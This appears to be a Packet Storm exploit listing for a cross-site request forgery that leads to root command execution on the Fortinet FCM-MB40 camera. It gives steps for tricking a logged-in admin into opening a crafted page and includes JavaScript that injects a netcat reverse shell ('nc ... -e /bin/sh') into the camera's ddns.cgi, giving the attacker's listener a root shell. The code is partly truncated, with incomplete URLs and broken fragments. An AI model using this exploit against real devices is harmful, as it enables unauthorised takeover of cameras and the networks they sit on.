Fortinet FCM-MB40 Cross Site Request Forgery / Remote Command Execution

Type packetstorm
Reporter XORcat
Modified 2019-06-25T00:00:00


                                            `# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF  
# Date: 2019-06-19  
# Exploit Author: @XORcat  
# Vendor Homepage:  
# Software Link: Customer Account Required  
# Version: v1.2.0.0  
# Tested on: Linux  
# CVE : TBA  
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)   
Full details:  
Follow the following steps to demonstrate this PoC:  
1. Replace IP addresses in Javascript code to repr esent your testing  
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp  
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.  
* Note: all modern browsers will cache Basic Authentication  
credentials (such as those used by the FCM-MB40) even if the  
FCM-MB40's administration page is closed.  
4. Open the crafted HTML document using the "admin" user's  
* Note: In an attack scenario, this step would be performed by  
implanting the code into a legitimate webpage that the "admin"  
user visits, or by tricking the "admin" user into opening a page  
which includes the code.  
5. Note that the `netcat` listener established in step 2. has received  
a connection from the camera, and that it is presenting a `/bin/sh`  
session as root.  
* Note: type `id` in the `netcat` connection to verify this.  
_Note: After this issue has been exploited, the state of the system will  
have changed, and future exploitation attempts may require  
const sleep = (milliseconds) => {  
return new Promise(resolve => setTimeout(resolve, milliseconds))  
var sed_url = '^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';  
var execute_url = '';  
var sed_img = document.createElement("img");  
sed_img.src = sed_url;  
sleep(400).then(() => {  
var execute_img = document.createElement("img");  
execute_img.src = execute_url;  
<h1>Welcome to my non-malicious website.</h1>